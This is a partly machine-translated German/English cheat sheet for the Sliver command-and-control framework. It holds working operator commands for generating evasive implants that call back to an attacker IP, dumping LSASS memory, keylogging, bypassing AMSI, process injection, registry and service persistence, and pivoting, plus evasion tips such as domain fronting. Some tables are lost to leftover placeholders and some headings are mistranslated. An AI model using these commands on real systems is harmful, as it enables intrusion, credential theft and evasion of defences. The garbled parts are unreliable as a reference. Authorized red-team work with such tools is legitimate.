Sliver C2 Framework Cheat Sheet

📋 Kopie Alle Befehle 📄 Erstellen von PDF_HTML_TAG_57___

_

Im Überblick

Sliver ist ein moderner, offener plattformübergreifender adversärer Emulations-/roter Teamrahmen, der als Alternative zu Cobalt Strike konzipiert ist. Es bietet erweiterte Befehls- und Kontrollfunktionen mit Unterstützung für mehrere Plattformen, evasive Kommunikationen und Team-basierte Operationen.

ZEITSCHRIFTEN Warning: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

• Installation

Pre-compiled Binaries (Recommended)

```bash

Download latest release for Linux

curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -o sliver-server chmod +x sliver-server

Download latest release for macOS

curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_macos -o sliver-server chmod +x sliver-server

Download latest release for Windows

Download sliver-server_windows.exe from GitHub releases

```_

Build from Source

```bash

Install Go (version 1.19+)

git clone https://github.com/BishopFox/sliver.git cd sliver make ```_

Docker Installation

```bash

Pull official Docker image

docker pull bishopfox/sliver

Run Sliver server in Docker

docker run -it -p 31337:31337 -p 8080:8080 bishopfox/sliver ```_

oder Basisnutzung

Starten von Sliver Server

```bash

Start the server (first run will generate certificates)

./sliver-server

Start server with custom configuration

./sliver-server -c /path/to/config.json

Start server in daemon mode

./sliver-server daemon ```_

Client Connection

```bash

Connect to local server

./sliver-client

Connect to remote server

./sliver-client -c /path/to/client.cfg

Generate new client configuration

./sliver-server operator --name username --lhost server-ip ```_

Befehlsnummer

Server Management

Command	Description
INLINE_CODE_30	Display help information
INLINE_CODE_31	Show version information
INLINE_CODE_32	List connected operators
INLINE_CODE_33	Disconnect an operator
INLINE_CODE_34	Access the Sliver armory (extensions)
_
### Listener Management__TABLE_66_
### Implant Generation
Command	Description
---------	-------------
INLINE_CODE_42	Generate implant
INLINE_CODE_43	Generate mTLS implant
INLINE_CODE_44	Generate HTTP implant
INLINE_CODE_45	Generate DNS implant
INLINE_CODE_46	List implant profiles
INLINE_CODE_47	Create new profile

Sitzungsmanagement

Command	Description
INLINE_CODE_48	List active sessions
INLINE_CODE_49	Interact with session
INLINE_CODE_50	Background current session
INLINE_CODE_51	Kill a session
INLINE_CODE_52	Kill all sessions
_
Hörer Setup

mTLS Listener (Empfohlen)

```bash

Start mTLS listener on default port (8888)

mtls

Start mTLS listener on custom port

mtls -l 443

Start mTLS listener with custom interface

mtls -l 0.0.0.0:8888 ```_

HTTP/HTTPS Listener

```bash

Start HTTP listener

http -l 80

Start HTTPS listener with custom certificate

https -l 443 -c /path/to/cert.pem -k /path/to/key.pem

Start HTTP listener with custom domain

http -l 80 -d example.com ```_

DNS Listener

```bash

Start DNS listener

dns -d example.com

Start DNS listener with custom nameserver

dns -d example.com -l 53 ```_

WireGuard Listener

```bash

Start WireGuard listener

wg -l 53

Start WireGuard listener with custom key port

wg -l 53 -x 1234 ```_

Implant Generation

Basic Implant Generation

```bash

Generate Windows executable

generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe

Generate Linux ELF binary

generate --mtls 192.168.1.100:8888 --os linux --arch amd64 --format elf

Generate macOS binary

generate --mtls 192.168.1.100:8888 --os darwin --arch amd64 --format macho ```_

Erweiterte Implantatoptionen

```bash

Generate with custom name and save location

generate --mtls 192.168.1.100:8888 --os windows --save /tmp/implant.exe --name MyImplant

Generate with evasion features

generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols

Generate shellcode

generate --mtls 192.168.1.100:8888 --os windows --format shellcode

Generate shared library

generate --mtls 192.168.1.100:8888 --os linux --format shared ```_

Inszenierte Payloads

```bash

Generate staged payload

generate --mtls 192.168.1.100:8888 --os windows --format exe --strategy staged

Generate stager

generate stager --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe ```_

Sitzungsinteraktion

Grundlegende Sitzungsbefehle

```bash

Get system information

info

Get current user

whoami

Get current working directory

pwd

List files and directories

ls

Change directory

cd /path/to/directory

Download file

download /remote/path/file.txt

Upload file

upload /local/path/file.txt /remote/path/ ```_

Process Management

```bash

List processes

ps

Get current process info

getpid

Migrate to another process

migrate

Execute command

execute

Start interactive shell

shell

Terminate process

terminate ```_

Network Operations

```bash

Get network interfaces

ifconfig

Get network connections

netstat

Port forward

portfwd add --bind 127.0.0.1:8080 --remote 192.168.1.10:80

List port forwards

portfwd

Remove port forward

portfwd rm --id

SOCKS proxy

socks5 start

Stop SOCKS proxy

socks5 stop ```_

Privilege Escalation

```bash

Get current privileges

getprivs

Attempt privilege escalation

getsystem

Run as different user

runas -u username -p password

Impersonate token

impersonate

Revert to self

rev2self ```_

Persistence

```bash

Install service persistence

persistence service --name ServiceName --path /path/to/implant.exe

Install registry persistence

persistence registry --hive HKCU --path "Software\Microsoft\Windows\CurrentVersion\Run" --key "MyApp"

Remove persistence

persistence remove --id ```_

Erweiterte Eigenschaften

Pivoting and Lateral Movement

```bash

Generate pivot listener

pivots tcp --bind 0.0.0.0:9999

Connect through pivot

generate --mtls pivot-host:9999 --os windows

List active pivots

pivots

Stop pivot

pivots --id stop ```_

Credential Harvesting

```bash

Dump process memory

procdump -p -s /tmp/dump.dmp

Dump LSASS

procdump -n lsass.exe -s /tmp/lsass.dmp

Screenshot

screenshot

Keylogger

keylogger start keylogger dump keylogger stop ```_

Evasion Techniques

```bash

Process hollowing

execute-assembly --process notepad.exe /path/to/assembly.exe

In-memory .NET assembly execution

execute-assembly /path/to/assembly.exe

PowerShell execution

powershell -c "Get-Process"

Bypass AMSI

armory install bypass-amsi ```_

Profil und Vorlagen

Profile erstellen

```bash

Create new implant profile

profiles new windows-profile --mtls 192.168.1.100:8888 --os windows --arch amd64

Generate from profile

generate --profile windows-profile

List profiles

profiles

Delete profile

profiles rm windows-profile ```_

C2 Profile Customization

```bash

HTTP C2 profile with custom headers

http --lhost 0.0.0.0 --lport 80 --website /path/to/website

HTTPS with custom certificate

https --cert /path/to/cert.pem --key /path/to/key.pem --lhost 0.0.0.0 --lport 443 ```_

Armory Extensions

Erweiterungen installieren

```bash

Update armory

armory update

Install extension

armory install

List available extensions

armory

List installed extensions

armory installed ```_

Beliebte Erweiterungen

```bash

Process injection techniques

armory install process-injection

Credential dumping

armory install credman

Registry operations

armory install registry

WMI operations

armory install wmi ```_

Team Operations

Multi-Operator Setup

```bash

Generate operator config

./sliver-server operator --name operator1 --lhost server-ip --save operator1.cfg

Connect as operator

./sliver-client -c operator1.cfg

List connected operators

operators

Send message to operators

msg "Hello team!" ```_

Session Sharing

```bash

Share session with team

sessions -i --shared

Take control of shared session

use ```_

Fehlerbehebung

Häufige Fragen

Verbindungen Probleme ```bash

Check listener status

jobs

Restart listener

jobs -k mtls -l 8888

Check firewall rules

Ensure ports are open on server

```_

Implant Nachweis ```bash

Use evasion options

generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols --debug

Try different communication protocols

generate --dns example.com --os windows

Use staged payloads

generate stager --mtls 192.168.1.100:8888 --os windows ```_

Leistungen ```bash

Adjust beacon interval

use reconfig --beacon-interval 60s

Use compression

reconfig --compress ```_

Debugging

```bash

Enable debug mode

./sliver-server --debug

Check logs

tail -f ~/.sliver/logs/sliver.log

Verbose client output

./sliver-client --debug ```_

Sicherheitsbedenken

Operationelle Sicherheit

• Verwenden Sie verschlüsselte Kommunikation (mTLS empfohlen)
• Regelmäßig rotieren Zertifikate und Schlüssel
• Implementierung der richtigen Zugangskontrollen für Betreiber
• Alle Aktivitäten überwachen und protokollieren
• Verwenden Sie Staging-Server, um direkte Zuschreibung zu vermeiden

Evasion Best Practices

• Vary Beacon Intervalle und Jitter
• Verwenden Sie legitim aussehende Domains und Zertifikate
• Implementieren Sie Domain-Front, wo möglich
• Verwenden Sie mehrere Kommunikationskanäle
• regelmäßige Aktualisierung von Implantaten und Techniken

Ressourcen

• offizielle Dokumentation
• (Sliver GitHub Repository)(https://github.com/BishopFox/sliver)_
• Bishop Fox Blog
• Sliver Community Wiki
• Red Team Village Sliver Training_

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Sliver C2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *